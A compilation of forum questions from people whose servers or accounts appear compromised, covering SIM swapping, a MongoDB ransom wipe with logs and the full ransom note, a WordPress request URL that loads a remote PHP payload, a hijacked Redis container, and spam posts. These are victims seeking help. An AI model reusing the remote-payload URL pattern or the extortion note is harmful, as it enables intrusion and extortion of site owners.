Can WhatsApp, Signal or Telegram be hacked through a SIM SWAP attack?

In Cuba the telecoms/ ISP monopoly, Etecsa, works with the political police to spy on dissidents, journalists and others. A common attack in Cuba is therefore SIM Swapping which is easy for them. It is also effective in order to eavesdrop on phone conversations and SMS. My question is: Would the SIM Swap enable the attacker to also hack WhatsApp, Signal or Telegram and gain access to these messages or calls? If so, are there any measures that can be taken to prevent the attacker from accessing the secure messaging apps via a SIM Swap attack? Thank you very much for your help

Mongo DB hacked (read_me_to_recover) without the port exposed in the firewall?

I Have recently setup parse-server on a DO vps, using 3 docker containers, one for parse-server, one for parse-server dashboard and one for mongodb. Because I am just testing this setup I left the mongo container as it is (mongodb://mongo:27017/dev). I have NGINX (not in docker) running as a reverse proxy (to get SSL), it forwards port 80 and 443 to http://127.0.0.1:4040 internal (the parse dashboard web gui). and it routes 1338 to http://127.0.0.1:1337 the parse server (API) itself. This parse server connects to my mongo DB internally.

This is the first time I am using Docker and mongoDB, because of this setup and the mongo db port not open I thought it would be half-decently safe. My question is, how did the hacker breach my database? There was nothing of value stored but there might be in the future. I don’t think he exploited my parse server because I could see the connection coming from a cpython client (the parse connection showed as nodeJS client.

I have added: NGINX, FIREWALL,Docker processes, Mongo LOG lines

nginx terminal

{"t":{"$  date":"2020-08-13T12:23:14.165+00:00"},"s":"I",  "c":"NETWORK",  "id":22943,   "ctx":"listener","msg":"connection accepted","attr":{"remote":"46.182.106.190:39672","sessionId":31,"connectionCount":3}} {"t":{"$  date":"2020-08-13T12:23:14.359+00:00"},"s":"I",  "c":"NETWORK",  "id":51800,   "ctx":"conn31","msg":"client metadata","attr":{"remote":"46.182.106.190:39672","client":"conn31","doc":{"driver":{"name":"PyMong                      o","version":"3.10.1"},"os":{"type":"Linux","name":"Linux","architecture":"x86_64","version":"4.15.0-112-generic"},"platform":"CPython 3.6.9.final.0"}}} {"t":{"$  date":"2020-08-13T12:23:15.941+00:00"},"s":"I",  "c":"COMMAND",  "id":20337,   "ctx":"conn31","msg":"dropDatabase - starting","attr":{"db":"READ_ME_TO_RECOVER_YOUR_DATA"}} 
> db.README.find(); { "_id" : ObjectId("5f3536cd2a546e2eea8211eb"), "content" : "All your data is a backed up. You must pay 0.015 BTC to 145Nny3Gi6nWVBz45Gv9SqxFaj                                                                                              uwTb2qTw 48 hours for recover it. After 48 hours expiration we will leaked and exposed all your data. In case of refusal to pay, we will contac                                                                                              t the General Data Protection Regulation, GDPR and notify them that you store user data in an open form and is not safe. Under the rules of the                                                                                               law, you face a heavy fine or arrest and your base dump will be dropped from our server! You can buy bitcoin here, does not take much time to                                                                                               buy https://localbitcoins.com with this guide https://localbitcoins.com/guides/how-to-buy-bitcoins After paying write to me in the mail with yo                                                                                              ur DB IP: restore_base@tuta.io" } 

My site appears to be hacked?

I recently found some random posts have been made from one of our user’s account without the user’s consent. We checked vividly with the security plugins but didn’t found anything. While we checked our Server Logs we found something like /ajax-index.php?url=http://majoydiego.com/wp-includes/css/dist/components/style.css

This URL contains a PHP payload.

Can anyone help me understand what is this code exactly and how the hacker gets access to my user and able to post? Though I uninstalled all those plugins and tried to secure as much as possible. But I am still worried!!!

Have I been hacked ( netstat output too many dgrams and stream connections) [closed]

enter image description hereenter image description here

enter image description here

netstat output

These are the output images of the netstat command I ran it shows that they’re are too many outbound connection and many dgrams and stream . I also tried to capture the output using Wireshark and then reverse checking the IP address to whom does it belongs ( using www.arin.net) it showed up various organisation ( Google, Astricia).

I also tried to turnoff the wifi and then ran netstat but no change in the dgram and stream connections.

Please help , any input will be appreciated.

Unusal GET requests in my nodejs journal – has my nginx/node been hacked?

Saw this in the journalctl for a service I have:

jul 29 12:39:05 ubuntu-18 node[796]: GET http://www.123cha.com/ 200 147.463 ms - 8485 jul 29 12:39:10 ubuntu-18 node[796]: GET http://www.rfa.org/english/ - - ms - -     jul 29 12:39:10 ubuntu-18 node[796]: GET http://www.minghui.org/ - - ms - -      jul 29 12:39:11 ubuntu-18 node[796]: GET http://www.wujieliulan.com/ - - ms - -     jul 29 12:39:11 ubuntu-18 node[796]: GET http://www.epochtimes.com/ 200 133.357 ms - 8485     jul 29 12:39:14 ubuntu-18 node[796]: GET http://boxun.com/ - - ms - - 

These GET requests are not coming from any code I’ve written.

"Correct" entries look like this:

jul 29 12:41:46 ubuntu-18 node[796]: GET / 304 128.329 ms - - jul 29 12:41:47 ubuntu-18 node[796]: GET /stylesheets/bootstrap.min.css 304 0.660 ms - - jul 29 12:41:47 ubuntu-18 node[796]: GET /stylesheets/font-awesome-4.7.0/css/font-awesome.min.css 304 0.508 ms - - jul 29 12:41:47 ubuntu-18 node[796]: GET /img/250x250/deciduous_tree_5.thumb.png 304 0.548 ms - - jul 29 12:41:47 ubuntu-18 node[796]: GET /stylesheets/style.css 304 7.087 ms - - jul 29 12:41:47 ubuntu-18 node[796]: GET /img/logos/250x250/brf_masthugget.250x250.jpg 200 0.876 ms - 9945 

The server is a nodejs instance v8.10.0, running on nginx v1.14.0, running on up to date Ubuntu server 18.04.

The ubuntu is a Digital Ocean droplet.

I’ve tried generating similar requests from a javascript console, but my the browser blocks access to http (not allowing mixed http and https); if I try https I get cross-origin error – which is good 🙂

I’m puzzled as to how these GET requests are being generated/sent?

Redis docker container has been hacked, next steps?

I accidentally left the port of my redis container open and noticed, that it crashed all the time today.

Now the mounted volume is full of files like red2.so, admin, root, www, apache, backup.db.

I closed the port, deleted the files and rebuild the docker container, is there a risk of my server outside of the container being infected?

There are no new or altered entries in crontab or the .ssh/authorized_keys file, but I’m not sure what I should check additionally.

My WordPress Website is Hacked, Showing unknown post which has not been posted by me [closed]

My WordPress Website is Hacked, This is my website blog link: https://bugyalvalley.com/blog/

Showing unknown post which has not been posted by me.. The name of the spam post is "Site De Rencontre Gratuit En Algerie" I don’t know what is this..

in dashboard category the post is hidden.. i am not able to see..

please help me to remove the post

screenshot of that post